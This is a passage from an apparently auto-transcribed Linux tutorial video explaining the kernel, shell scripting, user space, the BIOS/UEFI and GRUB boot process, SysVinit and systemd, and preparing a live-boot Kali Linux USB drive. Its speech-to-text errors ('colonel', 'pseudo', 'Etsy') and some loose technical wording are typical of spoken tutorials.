kernel translates that call it transfers that call to the actual hardware and it’s the bridge that does that communication the key roles of the kernel are resource management and several other management types as well so you have memory management Process Management device management and file system management so allocates and deallocates memory to processes as needed and we’re talking we’re not talking about storage here we’re talking about the random access memory the processing memory you have the process management to create schedule and terminate processes it controls access to Hardware devices like the dis drives the network cards and the printers and then you have the managing of the file system and providing access to files and direct so memory management specifically it all allocates memory to processes as needed dividing physical memory into virtual memory segments page fault handling so a page fault or a page in general is just a a certain amount of data and the handling of the faults that happen with pages is typically done within the kernel so if a process tries to access a memory page that’s not currently in physical memory the kernel triggers a page fault and then loads the missing page from the disk then it swaps So Physical memory is scarce so and typically it’s in a computer that’s a little bit older or maybe it doesn’t have as much physical RAM you know let’s say 4 gbt of Ram or less so if the physical memory is scarce if there isn’t enough physical memory the kernel swaps the interactive pages to the dis to free up memory for active processes we also refer to this as the swap space and we’re going to be talking about this a lot later on but if there isn’t enough physical memory the kernel is responsible for swapping between virtual memory as well as the physical memory to make sure that the system doesn’t crash and you get access to uh the amount of processing power that you need to be able to run your active processes so this is what we mean by memory management you can allocate memory you can handle any uh data loading so if there’s any data pages that aren’t loading the kernel is responsible for retrieving that data and then it’s also responsible for managing the actual swap space managing the processing power between the physical memory and any virtual memory pages that have been designed we also known as the swap spaces so that the proc the computer doesn’t crash and you can still actually run the processes that you need to process then we have the process management so we went from memory management to process management and process creation and termination is one of the big things so the kernel creates new processes it assigns them unique identifiers uid and then terminates them when they’re no longer needed so when you close it down it terminates it and the uid goes away process scheduling so if you have anything that should run a certain amount of time on boot for example when you start up your computer or every day or every 5 minutes whatever those things are done inside of the kernel that process scheduling is done inside of the kernel and then the CPU time efficiently is allocated via the kernal uh context switching so between different processes saving their state and restoring the state state of the process to the to be executed so for example if you go from Google Chrome to your text editor you’re technically switching the context and then if you come from the text editor back to Google Chrome you should be able to pick up where you left off where you were on Google and so that is considered a context switch and the kernel switches between those processes saving whatever their state was and then restoring it when you go back to it so that you can just continue with business as usual uh interprocess communication is also facilitated by the kernel meaning that they can share information and synchronize their activities with each other and interprocess communication could be something like copy paste for example you take something from one thing and you paste it to the other one or if you have two uh processes that are integrated with each other that rely on each other those things can be done via the kernel as well so the whatever the processes are whether it’s a background process or a foreground process meaning something that you can visibly see versus something that you don’t see that’s just running in the background there are certain communication that takes place between those processes to make sure that the computer is running properly your system is all good and that’s all done through the kernel so the conversations that happen between processes the conversations that happen between physical hard drives as well as uh the physical CPU and your software on the computer all of those conversations are handled via the kernel and finally we have the device management here or I think there’s actually one more one more role here but device management is one of the other ones as well uh which would be the loading and unloading device drivers uh software components that interact with specific Hardware it loads and unloads those specific things so you can interact and communicate with the physical Hardware you can have the input output operations so when you click something on your mouse that’s considered an input your mouse is considered an input device when you type in to something on your keyboard that’s considered an input device or the input that’s being received by the computer and then the reaction from the computer would be considered the output so if I click on something it needs to open that’s an output if I type something in the keyboard and it prints onto my screen that’s the output so the kernel handles the input and output transferring data between devices and the memory which would be considered all the processing that’s being done on the computer and then the kernel also responds to interrupts generated by the hardware devices like the dis drives and network cards and if there is any kind of interruption happening within the processes of those it’s also handled by the kernel itself Hardware abstraction layer also known as Hal so this is the consistent interface for software to interact with Hardware hiding the complexities of different architectures uh this abstraction allows software to run on various Hardware platforms without requiring significant modifications so the hell the hardware extraction layer it allows it’s all done by the kernel so this is another rule that’s done by the kernel and it’s consider the interface for a software to interact with Hardware so various Hardware platforms have different functionalities so a 4 GB Ram is different than a 16 GB Ram a CPU that is one brand is different from a CPU that’s Nvidia or something like this so these are various types of Hardware or Hardware platforms and this specific H this specific abstraction allows the computer the the software that you’re using to interact with these different types of Hardware without requiring any kind of modification right so that’s what the purpose of this is for you don’t need to modify this software to interact with a 4 GB Ram although it might run a little bit slower you don’t need to modify it because the kernel will handle all of that translation for you same thing if it’s a 32 GB Ram you don’t need to modify it the kernel will handle that for you specifically how within kernel will handle that for you and then we have the system call so this is another one of those things that I’ve already kind of touched on a little bit but a user level program interacting with the kernel and requesting Services is called a system call so you make a call to the system to do something for you you make a call to your calculator to process a uh calculation for you and then the kernel translates that call it translates that request to the CPU the CPU processes that and then feeds it back to you so you put your input into the calculator the kernel translated that input or transferred that input to the CPU the CPU processed it and then the results came to the calculator as an output for you that’s called a system call system calls enable programs to perform tasks like creating files reading and writing data making network connections doing calcul ations playing a video yada yada yada all of these things are considered a system call then we have security so this is this is one of the big things for our community the cyber security and hacking community so security mechanisms to protect the system from unauthorized access and malicious attacks is done via the colonel it includes user authentication Access Control list and network security feature so user authentication meaning the colonel verifies the user identities and grants access access to some resources based on their privileges that’s all done by the colonel so when somebody logs in first of all it verifies that okay this login is actually correct and once you’re logged in the colonel processes your actual permissions and says okay based on what Hank has privileges to he can access these various resources and that’s all done by the colonel all behind the scenes so as soon as you log in the colonel says okay you have permission to it’s not going to declare it to you onto the screen but it’s just going to process that internally and it’s going to say okay okay this user has permission to access all of these things based on there are password and username and permissions that have been assigned to them their privileges that have been assigned to them then there’s access control so it enforces Access Control mechanisms to protect system files and directories so if you actually can’t if you shouldn’t have permission to access a certain file the kernel is the one that says hey user uh access denied right you don’t have access to this thing because of your privileges for your user and then there’s the network security feature like firewalls and packet filtering to protect the system from Network attacks to detect a fishing link that’s been clicked or to detect that you’re visiting a malicious website or to detect that somebody is trying to access your system and they’ve been denied access through the firewall all of this is done by the kernel the kernel processes all all of those uh commands and all of those requests aka the system calls and now we have the shell so the shell is probably the most basic vers of your interaction with the kernel so it’s a command line interpreter that allows you to interact with a computer system and it’s text based so it’s a you you you probably have seen a version of a shell when you see any kind of a movie or a show about hacking it’s that black screen that has a bunch of white text on it and it looks like gibberish but to the hacker they hopefully they know what the hell they’re doing um that person interacts with the system through the shell so when when we want to make a system call for example we want to run a program when we want to access something inside of the file system or manage the resources of the system the shell is our way to interact with the computer system and this is how you interact with the kernel you’re not you’re not technically directly interacting with the kernel but when you input something into the shell the kernel takes that input and processes it and goes and calls on the system some resources and the file system does everything else that you want it to do and this is how you directly communicate with the kernel there’s a lot of different ways to communicate with the kernel for example your calculator or your text editor but at the most basic level when you’re interacting with the a Linux server that only has a command line the shell is how you interact and how you process your commands to the system the shell works like this you provide your input right so you type in a command into the shell the command gets parsed so meaning the let’s say there are four different pieces to that command you say pseudo which is one portion of the command you say Nano which is another portion of the command and then you say the name of the file so let’s say that’s three different commands right so it gets parsed the command gets broken down into its individual sections or its individual tokens and then it gets executed so pseudo says that you have root level privileges and the shell will process that first and it’ll say okay if you have root level privileges enter enter your password so I can verify that you’re actually root and then when you do it say okay so you’re all good or it’ll say you actually don’t have access to this then once it has processed that then it’ll execute Nano and Nano is a text editor so it’ll just open up the file name which will be the third piece of that command it’ll open up that file name inside of the Nano text editor meaning that it’s executing the full command that you’ve given to it and then once you do that it opens the file and you get to see the contents of the file which is considered the output shell scripting is a an extension of Shell’s uh interactions and commands that essentially allows you to create a document put a bunch of commands inside of it and then when you run that one document when you run that one shell script then it runs all of the commands inside of that shell script without you having to manually input all of those commands so this is a very powerful Concept in automation so if you have a repetitive task like looking at a log file and doing it daily and you need to make sure that there’s nothing fishy inside of the log file you create a script that checks that log file every single day and it checks for certain strings or certain pieces of data to make sure that it’s not in there and if it’s is in there it’ll give you an alert that says hey there’s something to worry about if it’s not it just says hey everything’s all good system check everything’s fine and that’s a very very simple but powerful use of a shell script so you can create a bunch of different repetitive tasks or automate a bunch of different repetitive tasks using shell scripts and these are essentially text files like we also mentioned and they just have a sequence of commands that can be executed by the shell uh why we use the shell script is as you can imagine when you think about automating it does a lot of different things for you so number one it’s efficient so instead of you having to do it every single day you can just schedule a task via one of the tools that we already talked about and go through that task scheduling with a shell script so you say hey system run this shell script every single day at 9:00 a.m. or every single time that I start this computer run this shell script so it automates that for you okay the second part of this is that it’s very consistent so sometimes the human makes an error when they run a shell script or not even a shell script so let’s say you want to run one of the commands and you mistype something that’s considered human error or you forget a part of your series of commands that you’re supposed to run that’s a human error so instead of relying on the human you just write it once make sure that it’s written really well and there are no errors in it and now every single time that you need to perform that single task it’s done consistently exactly how it’s supposed to be every single time that’s great flexibility is that if you wanted to do the same task but you want to do it with a variety of different files or with a variety of different users you can just modify that script and then now it’ll do the same exact series of actions now I’ll just do it with this user and then the next user and so on so so it’s flexible you can modify it and then of course you can reuse it to death you can just keep running the same script over and over and over again and it’ll never complain it’ll never you know uh waver it’ll never uh water itself down it’ll run exactly the same way over and over and over again and will’ll have no problem no matter what version of Linux you’re running no matter how old it is so on and so forth is super reusable and it’s just very useful so some of the system administ ation use cases you can backup system files you can monitor system resources you can install in configure software you can automate user account management uh you can parse log files you can extract data from those files you can convert file formats uh you can deploy web application you can run tests again those applications you can compile and Minify code which is actually very useful and then there’s just general stuff so renaming the files in bulk moving and copying files scheduling tasks all of these things can be done through the creation of shell scripts so we’re going to get into the nitty-gritty of this when we actually start creating shell script so you don’t necessarily need to memorize all of this right now because you’re going to run this over and over and over again to practice these things and create them but when you open a shell file when you create a shell file that essentially could be file. sh that would be a shell file you open that the very first line needs to be the shebang line that calls to the path of your your specific shell bash or zsh or whatever it is that would be The Interpreter that you use to write the rest of the code so when you put that at top of the text document the computer then knows okay this is what I’m going to run first this is the very first thing that I’m going to run and this is going to interpret the rest of the commands in this document so then it knows that it’s supposed to run a script and then you can start usually the very next line is a comment so notice how this has a uh hashtag right here but there’s a uh exclamation at the second part of it and then you have the path to the the file The Bash file what this is is very different by having a singular uh hashtag the singular hashtag is just a comment meaning that this is not being processed it’s just something for somebody else who opens this file that wants to see what these individual lines of code represent so you have a #and then you explain what the next block of code does or at the very top of the file you’ll have one hashtag right under your shebang line that will explain okay the purpose of this script is to do X Y and Z and then for each block of code or for even sometimes even each line of code you will have a comment right above it that says this is what this line of code is going to do and then you’ll have the line of code that doesn’t have this so if there’s no comment uh hashtag in front of it that line of code is actually going to be executed which means if you don’t want the script to execute that line of code you put a comment in front of it and then all of a sudden that specific line of code has been neutralized and deactivated and this is actually something you’ll find a lot in configuration files where a lot of the commands that have already been pre-written there’s a comment uh sign in front of them there’s a hashtag in front of them which means that that specific line of code isn’t being run but if you want to configure that software to do that specific activity you just remove that #and now that line of code has been activated and then there are structures for actual flows so there would be the if else commands so if this happens do this otherwise meaning else if this happens do this else do this other thing or don’t do anything for XYZ do ABC uh while this is true then I want you to do this other thing if it’s not true then stop doing it these are types of the control flows and then you have variables so it could be you know name is equal to Hank that would be a variable and then you can use values inside of variables and variables are very very useful but essentially these are kind of like the main points of a script you can create variables within those V or you can uh call on the elements of those variables inside of an IFL statement you can have inside of the IFL statement you can have multiple variables and just recycle all of these things over and over and over again to create complex bits of code but for the most part this is the basic super super basic structure of a shell script and then we have the user space so the user space is the environment where the user level applications actually execute so it’s the separate space from the kernel obviously but it’s the the front-facing uh environment where the user actually interacts with the system so it’s an isolated environment for applications to run without directly interacting with the hardware so it goes from the user space to the kernel and then to the hardware um technically the shell is a part of the user space um this is a crucial separation for system St stability and security because the you don’t want the average user that doesn’t know what the hell they’re doing they don’t know their head from their butt for for a lack of a better word you don’t want the average user to start interacting with the kernel directly because they’ll mess up the system so you give them a user space and a user space has its own series of filters and software that interacts with the kernal and then if there’s something wrong the user space typically is the output that dis plays whatever the error message is to the user that says hey this is what you did wrong and this is what you need to fix uh the key characteristics of the user space are that the processes are isolated from each other and from the kernel preventing one process from affecting the other so for example the video uh viewer so your video player shouldn’t be interacting with a text editor right it just isolates these processes from each other and they also get isolated from the kernel itself the user space contains a wide range of applications including text editors web browsers games system utilities and then there’s limited privileges that have been applied so preventing uh the user space or from these actual uh users or these softwares from accessing Hardware or accessing Hardware directly or modifying system level settings so you can’t use a basic text editor to modify the kernel it just doesn’t allow you to do it because there there’s the limit of the authentication that takes place and the Privileges that are verified by the colonel that say Hey you can’t modify me you don’t have the Privileges to modify me and this is where a lot of these things come in from right so for each user their user space has limited privileges according to whatever the system administrator said they could or could not do the user space is separate from the kernel but they actually interact with each other right so the user space is how the user communicates with the colonel whether or not they know that they’re doing it the colonel provides system calls that allow userspace processes to request services from the kernel services that are requested by the userspace from the kernel are the file as file system access network communication process management memory allocation so uh reading and writing files right sending and receiving Network packets meaning you send uh Gmail to somebody or try to connect with gmail through your internet uh or connected with YouTube through your internet those are all considered sending and receiving Network packets it doesn’t seem very fancy when you think about it like this but every time that you request a video to be loaded from YouTube you’re requesting a packet of data to be delivered to you and that’s done through your network creating and terminating and managing processes and memory allocations so requesting and releasing memory um by using the calls to the system so system calls as we mentioned earlier the user space processes interact with the hardware devices and other resources through the kernel ensuring a secure and controlled environment so when you when you think about the kernel and then the shell and then the user space when you think about these three things you can see how they kind of layer on top of each other the kernel is the bridge between the user talking to the hardware but they need some way to talk to the kernel so they use the various tools and software and resources from the user space to talk to the kernel and then the kernel talks to the hardware and that’s basically how you interact with a system in general and now we need to know how the computer boots how does a machine boot what is the boot process so there’s something called bios and then the updated version which is UF bios is the basic input output system and it’s common onto older systems um you may have actually I don’t know how old you are but I remember bios on my very first computers when I would boot the computer it would say you know bios is initiating right so it initializes the hardware and passes control to the bootloader so it actually turns on the hard Ware the CPU the motherboard Etc and then it passes the control to the boot loader meaning it’s going to boot or load the rest of the system right to access bio setup you typically need to press this a specific key uh depending on the computer it would be delete F2 or escape again this is very old most likely your computer does not have bios and it has UF and that you do that during the boot process so as soon as you turn the computer on you start tapping F2 for example until you actually get to the BIOS menu and allows you to very uh configure the various system settings like the boot uh order the clock speed and the hardware settings and the way that looks is like this so This is actually when you get to the boot menu again I don’t know if you recognize this most likely you don’t recognize this because this is ancient um for the most part um some people I know that we have a few viewers that uh are a little bit uh there’re around my age or maybe a little bit older than me that would definitely recognize this and this is something that would be done in you know really old computers but this is basically the the BIOS menu right so this is when you actually get into BIOS and then you can do things like you know the boot priority of the hard disk quick boot first boot device second boot device third boot device checking of the password and etc etc etc uh this is not interacted with the mouse this is interacted strictly with the keyboard um I don’t know how much of this is completely relevant but this is basically what you need to know is that bios is on the older systems it’s considered the basic input output system and this is the piece of the boot process that initializes the hardware and then after the BIOS is done it passes the control of the hardware to the boot loader key functions is to power on and self test it’s called post so it cond and conducts a series of tests to check if the hardware is all good and then it issues a series of beeps to indicate the outcome of the test so this is very nostalgic for me I can I can recall those beep sounds every time I turn on my computer and if there’s an issue the beep sounds are different and once the post is done Hardware initial initialization happens so it initializes the essential Hardware like the keyboard the mouse the dis drives then it transfers the control to the boot loader which loads the operating system um which then loads the system itself so it it it loads it passes the control to the operating system bootloader and then it goes from the boot boot loader to the operating system itself so it goes from bios to post initializes The Mouse and the drive so on and so forth and then it initialize the boot loader to process the rest of the boot process and then it transfers the control of everything to the actual operating system and then you have the basic input output services so that’s the rest of these things uh for the operating system like the keyboard and mouse and display output those are the things so the keyboard and mouse would be your input display output would be the monitor and that’s your basic input output UF the unified extensible firmware interface which is just a big mouthful compared to basic input output system um the UF is the modern interface designed to replace bios it offers more flexible faster secured boating process compared to bios and this is what this looks like so you just from the get when you look at it you’re like oh this is this seems more modern right it typically does the same things though so it can actually have the same boot or tool or password or prioritization all of those things still can happen with the ufy it just happens to be quicker it happens to be a little bit more secure in this particular screenshot we see that there’s an AI tweaker wow super fancy so it allows you to have the overclock tuner the CPU the selection the filter of the pl yada yada yada these are all of the things that fall under the CompTIA A+ category to understand what all of these things actually mean and you don’t need like you really don’t need to master this for Linux it’s just that you need to understand that there was initially bios and then there was UF and then the process of the or the purpose of these things is to interact with the hardware make sure that the hardware is initialized make sure that all of the system checks are good so everything is running smoothly and then it transfers the control to the boot loader which does the rest of the loading of the boot process and then ultimately trans transfers the control to the operating system itself which means that it transfers it to Windows operating system or Linux operating system or Macos operating system they usually all have the same type of process it first calls on the hard devices the hardware and then the hardware is all good then it transfers the control to the operating system key advantages of UF over bios UF can boot systems faster um the graphic user interface so it’s actually point and click instead of just being uh keyboard navigated and it’s nicer so it’s a userfriendly graphic user interface uh secure boot so it enhance security features like secure boot which helps protect system from malicious software attacks uh large dis drives are supported through this it can support the largest dis drives or larger dis drives than bios could and then there’s Network boot that allows you to boot from a network resource making it easier to deploy and manage systems remotely so you can actually run something from a different location which was not previously available through bios um very similar to what bios was right so it still has the post the post power on self test it still has the bootloader execution and it still has the operating system boot so all of those things still happen with UF um it’s doing literally the same thing it’s just a little bit more advanced more flexible than what the standard was uh with bios and it’s faster more secure more futurer boot process that’s basically what it is it’s it does essentially the same exact thing it just does it faster it’s a little bit more flexible it allows you to do it from a remote location it’s more secure so on and so forth then you have the actual boot loader so the bootloader is the middle ground between bios UF and the actual operating system so once you uh start the BIOS or once you start UF the grand unified boot loader or grub is the bootloader that’s in Linux distributions and it takes control of the system and finishes the initial boot process then the inter so again it’s the middle ground right it’s the intermediary between the hardware and the operating system and ensures that the correct operating system is loaded and it provides a userfriendly way to choose between different boot options so for example when we go through the installation portion of this and you see as I go through the install process of Linux we’re going to be using uh the bootloader of my machine and we’re going to see oh you know what it’s actually choosing us to choose Cali or the Windows installation it’s it’s allowing us to choose the OS that we want to load and that’s where that goes right so the BIOS and UF make sure that the hardware is all good and there are no glitches and then it goes to the boot loader and the bootloader says okay which one of these os’s do you want me to load and that’s essentially the whole process between this thing and this is kind of what literally this is actually what it looks like uh just a much kind of a more modern version on the computer that I had but you see right here it actually has two different operating systems it has Linux Mint and it has Ubuntu and it has advanced options for Linux Mint and advanced options for Ubuntu so it has two different operating systems that you can choose from and then it loads it right so it’s flexible it can support multiple operating systems making it versatile for dual boot and multi- boot uh it it allows customization of the boot menu timeout settings default boot options through a configuration file so you can develop that we’re not going to talk about that um it can be configured to provide secure boot options protecting the system from malicious bootloaders and it supports Advanced features like the chain loading Network booting and kernel parameters which again are beyond the scope of this particular training but what you need to know bios UF checks the hardware passes control to the bootloader which allows you to check which operating system you want to run and then from there it transfers the control to the actual operating system so the boot menu presents a boot menu that allows you to choose which operating system you want which you already saw uh if you have dual boot which was what the example was you can choose whichever one that you want to boot whichever OS you want to boot then once you’ve selected it grub loads the actual kernel and initial Ram dis into the memory and then it transfers the control to the loaded kernel which then takes over the boot process dual boot is literally what you saw so this is just a breakdown of it when you install the operating system alongside an existing one so for example that Linux Mint could have been the primary and Ubuntu could have been the secondary the installer software modifies grubs configuration to include the newly installed OS as a boot option creating the boot menu generates a boot menu uh user selection allows you to choose the desired operating system from the menu and then loading the selected OS and then transferring the control to that OS once it loads the OS it loads the kernel for that OS and then the initial Ram the random access memory for that and then it it allows you to actually start processing or allows the computer to start processing all of those things and then the control is sent to those things so it transfers the control to that kernel and that uh RAM initial Ram dis and then those things essentially take over the control from the grub and then you’re actually in the operating system and it in initializes the operating system and that’s when you actually get into Linux right so the benefits of this is that it’s flexible you can have multiple loads uh experimentation you can test new operating systems it’s uh specifies task optimization for the specific OS that you want so if you want uh one that’s in inherent to gaming uh or one that’s intuitive or just better with gaming uh software development system administration all those things you can actually CH choose based on your goal so you can choose the OS that matches your goal and any data that’s stored on partitions that would be formatted with different file systems you can actually go access those individual ones so for example if you have data that’s only available to the NTFS which is a Windows thing you can go and recover that data because you have dual boot and then once you’ve got gotten that you can switch to Linux right so it allows you to deal with different formattings of data as well as different goals like gaming software development so on and so forth so it’s flexible it’s it’s very beneficial if you can do it then do it if you just want to run uh Linux from a USB drive and have a live boot then do that if you don’t want to mess with your overall Hardware installation or the the storage capacity of your hard disk then you can just load everything from a live USB which is good as well so dual boot is more when you install it to the actual hard drive itself to the actual physical computer you install Linux and now you have Windows and Linux on your file system then it goes from grub to CIS vinet so it’s the CIS vinet is actually the traditional initialization system that was used in Linux dros to start system services and processes during brute so uh CIS vinet or the next one the systemd that we’re going to talk about those two are the step right after grub and the bootloader so it’s basically a sequence of scripts that run in a specific order to bring up the system um the it runs those scripts so the if you are running cisv it which is again kind of like the Legacy the older version of it it runs the scripts that are located inside of the Etsy in itd uh folder and they’re responsible for starting and stopping the system Services um it has different run levels so for example run level zero is the halt state run level one is the single user mode run level five is is the default multi-user mode and it can uh choose those based on whatever the configuration was and then during the boot process it transitions through various run levels starting from a low level gradually moving to the higher level and then as it moves through those it executes the corresponding initialization scripts for each one of those run levels that are all located inside of this right the limitations here are that it’s pretty complex to configure this and difficult to understand if you don’t know coding or development language or uh syntax it can be relatively slow especially on systems that have a lot of services or they don’t they have physical limitations like the the ram is small or the CPU is old so it can be fairly slow to boot and it’s limited on parallelism meaning that it can only start the services one after the other which is sequentially uh which is inefficient right you you typically want to start everything at the same time if you just have to wait for this one to load and then move to the next one and then move to the next one it’ll take a long time especially if the system itself if the hard uh Hardware on the system is actually slow and old then this process can actually be fairly lengthy so then you want to go into system D which is the more current version of it it’s sophisticated and it essentially does what CIS vinet did but it does it better it’s faster more flexible more feature Rich and it’s the it does the same thing right so where where UF did the same thing that bios did systemd does the same thing that CIS vinet did and the way that it works is that during the boot process it takes control and starts essential Services it manages the life cycle of system services including starting staring and restarting them it ensures that the services are started in the correct order and based on their dependencies and then it logs system advents and applications to a central Journal so this was not previously provided by CIS vinet right so it goes through the boot process it runs all the services that it needs to if there’s any dependencies that are required by those Services it’ll make sure that all of those are also started and then it journals the entire process and logs them in case there’s any kind of uh troubleshooting that needs to take place that you can backtrack and find out what happened um it’s faster obviously as we’ve already talked about it runs those systems in parallel so as we talked about where it doesn’t provide parallel options in CIS vinet this can actually optimize everything by running everything at the same time and starting them at the same time time which reduces the boot time significantly as you can imagine um if there are any dependencies by those services so if a service requires something else to run it manages those dependencies automatically and just makes sure that everything is all good so that all of these things load simultaneously some things have dependencies that are required and we’ll talk about the installation of dependencies later but the you want all these things to load simultaneously you want them to load automatically without you having to worry about about it without the average user having to worry about it cuz they don’t know what they’re doing so it provides a unified framework for managing system services including starting stopping restarting and enabling disabling services that is system d uh it activates sockets uh Serv uh services that can only uh needed for further improving system performance um it can be activated through the sockets and sockets are actually also very useful for networking as well but that’s beyond the scope of what we’re talking about so system can activate Services only when they are needed further improving system performance so if you don’t need it it’s not going to be activated journaling we already talked about it in case there’s a crash or analyzing system logs timers and scheduling so precise scheduling of tasks and device management managing devices like disk network interfaces and USB devices all of this is done through systemd which is very awesome and most likely hopefully the thing that you will have to deal with when you go through your actual responsibilities as a Linux administrator um most likely you will not have to actually deal with this in the real world at all meaning you won’t have to deal with CIS vinet most likely unless you’re really dealing with like an old school system um if you do then just remember that they’re they run uh all of everything is run based on those run levels that are associated with each one of those scripts that are inside of the Etsy folder and the stuff is done not in parallel meaning it’s done one after another another it doesn’t deal with uh dependencies very well it’s fairly slow these are the key features that you need to keep in mind about CIS vinet and where CIS vinet falls short systemd takes all of those things and then some and just fills in all of those gaps and you just saw how it did all of those things and this is where we actually get to look at those run levels and boot targets so run levels would be relevant to CIS vinet right so these are the specific uh boot processes that is done through those various scripts uh each run level represents a specific state in the system and then the system transitions through these things during the boot process so you have these run levels so halt the system basically means stop the system uh one would be the single user mode two is multi-user mode without the file system the NFS um then there’s three which is the multi-user mode without the graphic user interface four is not used five would be full multi-user mode with the graphic user interface and which is this is typically the default that loads and then six would be the rebooting of the system so these are the various run levels that come in CIS vinit and these are associated with those scripts that we talked about that are inside of that Etsy init D configuration so boot processes when a system boots it starts in a low run level and it works its way up as it initializes it moves to higher run levels starting whatever service is associated with that run level for each of those run levels the scripts are inside the Etsy in the directory and these are defined they Define the actions that need to be taken when entering or exiting a particular run level and then the init process which is responsible for managing the Run levels can be instructed to switch to a different run level using the tell init command or by issuing a specific signal and this is an example of That So when you say tell in it one you’re asking it to run level one right so tell in it five would be asking it to run level five and you start the system in single user mode which is what run level one is so it causes to transition to that stopping most of the services and going only to the environment that is associated with run level one and then you have boot Targets in system D which replaces run level so cvin it had run levels system D has boot targets powerful mechanism for managing the system State they represent groups of services that should be started or stopped altogether they uh Define and control the targets and by doing that you can efficiently manage the system’s Behavior under different circumstances so the target works like this you have the dependency management the activation of the Target and a deactivation of the target so it automatically determines what dependencies between services are required and then starts them in the correct order for whatever the services are that you need to have and when a Target is activated it si the system D starts all of those Services associated with that including the dependencies for all of those services and then when you deactivate it it stops all the services that are associated with it so fairly simple the common targets would be this right so you have the multi- user. target it’s the default Target it starts multi-user mode or multi- user Target and it start Services required for multi-user environments including networking file systems basic system Services graphical Target starts graphical services like the display manager and desktop environment rescue Target that start Services necessary for system recovery like a minimal shell and network access which typically does not happen unless you’re actually troubleshooting and there’s the emergency Target which is the minimal Target starting only the most critical Services required for system maintenance which does not include network access for the most part you’re only dealing with that specific system and you’re trying to figure out exactly what’s going on so it is the like the lowest level and it only loads critical Services required for system maintenance so that’s essentially the various forms of this this is the highest level and graphical user Target or the graphical Target and the multi-user target load uh together because you want to have multiple users including networking file systems basic system but the graphical Target starts the graphical surfaces like the display manager and desktop environment if you have a version of Linux that actually supports a GUI this is the Target that would come with the boot inside of system d if you want the CIS vinet scripts if you want to manage them uh you have to know where they’re located which is the Etsy init d uh they’re typically named after whatever service they’re actually running so Apachi 2 if you’re running Apachi 2 MySQL secure shell Etc uh each script contains instructions for starting stopping and restarting the corresponding Service uh suspended executes these in a specific order ensuring that services are started in the correct sequence and the dependency are met so for example if you are running an Apachi 2 server you would need to load the Apachi 2 server before you can load any other uh software or service that requires Apachi to be running if you try to load the software service but you don’t have aachi running then that doesn’t work right so it needs to run in order so it does that in the correct sequence to make sure that whatever needs the previous thing already has that thing so that it can run it system D enables a service and this is uh very very uh similar right here so instead of doing these scripts that would be running sequentially the way that they are you can do it manually uh through enabling disabling starting stopping checking restarting and reloading and this is all very the the pattern here is very very simple the syntax is very simple so if you want to enable a service you would use enable if you want to disable it disable start it stop it uh check the status of something restart something reload something it’s very very intuitive so pseudo system CTL system control enable service name disable service name start service name stop service name and if you can probably put two and two together you would need to enable the service first before you can start the service and then you would have to stop the service before you can disable the service so that’s the the order of these things that come in once you’ve enabled it you can check the service and it says oh it’s been enabled but it’s not going to be active because you haven’t started it once you start it you check that service status and you’re like oh this is active it’s currently running so you get that uh the status of that thing and then if you need to restart it you can just do restart the service you can’t restart it if it hasn’t been enabled common sense right and if you need to reload the service configuration after you’ve done certain modifications to the config file you would just reload the configuration or reload the service and it will just reload it it has to be running obviously actually it probably doesn’t need to be running but if it is already running and you modify the configuration and you want that configuration to apply you would need to reload it you don’t necessarily need to restart it okay so let’s talk about the installation and package management portion of this whole thing um specifically the preparing and installing distributions now selecting a Linux distribution really has a lot to do with what you are trying to accomplish um so there are a variety of different versions of these dros um so we have the desktop version for Ubuntu Fedora and mint we have the server version Cent OS the Ubuntu Server Debian and then there’s actually this one that I kind of forgot to put in the title here which is the red hat Enterprise Linux and of course there’s security and Pen testing for Cali Linux so it just depending on what it is that you’re trying to do uh these are the various uh locations that you can download your ISO images so this is what’s very important to consider so if I go to the Cali uh website here this is what it would look like and so we have the the various installer images virtual machines Cloud mobile arm devices containers live boots and so on and so forth for the Intensive purposes of this particular uh portion of this uh tutorial I’m going to be using a live boot ISO image which means we want to install something that we can load from a USB drive that’s the the whole purpose here and you can have it in like one of those mini kind of USB drive drives or you can actually have a an external drive that is attached via a wire that’s what I’m going to be using and mostly because the fact that I’m also going to be using it as a storage container so typically a small USB plugin uh that is like a the size of your thumb for example a thumb drive is what they call it uh um a small USB thumb drive does not have that much memory on it so it won’t go into the terabytes at least not that I have looked for recently I’m pretty sure they have them that can go into a significant portion of storage but I’m going to be using something that has a significant portion of storage because uh for the rest of these tutorial recording I have to record the videos on that specific drive and make it so that it actually has enough uh storage for me to store video files right so uh but essentially this can be installed on any kind of USB plug-in which is called a live installation it’s a live boot or live installation so we can choose anything that we want from this particular website depending on the type of service or the type of purpose that we have for that specific installation and then same thing applies to all of these other ones as well right so you want an ISO image for the uh the specific Dr that you’ve chosen so that you can have that installed either through your computer itself a hypervisor where it’s like a cloud computing virtualization or you want to install it as a live image that to boot from a USB drive so in in either one of those cases you would get your ISO images from these links I’m going to put these links inside of the description below so you can get access to them directly and I highly recommend that you don’t get them from any kind of a torrent website just get them directly from the actual website for these individual distributions so that you can be sure that there hasn’t been any manipulation done with the iso and you’re not downloading anything that you shouldn’t be downloading or anything that has been tampered with that’s the that’s a really big important piece right here you don’t want to download something that has been modified even if the developer says oh this is going to be really really helpful or whatever learn how to make those modifications yourself don’t download something that’s been pre-modified especially from a torrent website because you just you you never know what you’re going to be downloading and if there’s some kind of a malware or ransomware or something that’s installed on it the Trojan warm whatever you you just don’t want to deal with that kind of stuff so again one last final notice download directly from the websites that you see here so that you get the actual ISO images that have been verified and uh you know that they’re they’re good to go now as far as the installation process itself is concerned I’m just going to kind of give you an overview of this but I’m going to demonstrate what this looks like when you want to use uh one of these ISO images to install a uh uh limit Linux version for yourself so in this particular case now as far as the installation process is concerned I’m just going to give you like a step-by-step breakdown and then we’ll go into an actual live installation of Cali Linux cuz I love Cali Linux and we’re going to install it on an external USB drive and then you can just see what that entire process looks like so first and foremost you want to prepare your external drive I always format it especially if it’s just a fresh drive and you’re uh making you want to make sure that it runs on all of the uh major operating system so for example a Windows Mac OS and Linux operating system system you want your drive to be able to adjust to whatever that OS is and actually run on all of them if it’s formatted in one particular format and won’t run on Mac OS or Linux then you’re going to be hindered and limited so even it’s a brand if it’s a brand new drive that you’ve gotten you can use something like the Mac OS dis utility or the equivalent version on Windows to just format the the drive so that it can run on all of the different os’s and I’ll show you what that looks like in a bit so you want to prepare the drive and then make sure that it actually has enough storage space for Cali Linux it’s not a big file so the installation and the iso image is not large but the recommended size is to have at least 4 GB on the drive just to make sure that you’re all good um then you want to download the Linux from one of the official links that I gave you and get the iso image of the drro that matches your system architecture and your needs whatever you actually want to do and then we have the creating of the bootable media so this this is where etcher which is a tool it’s a free tool so is Rufus they’re both free tools etcher is for Mac OS Rufus is for Windows and it essentially turns uh the iso image it makes it creates a live image uh on that USB drive so that that USB can now be a bootable device and once you connect it to a Windows machine or anything that allows you to do that you can go ahead and load that 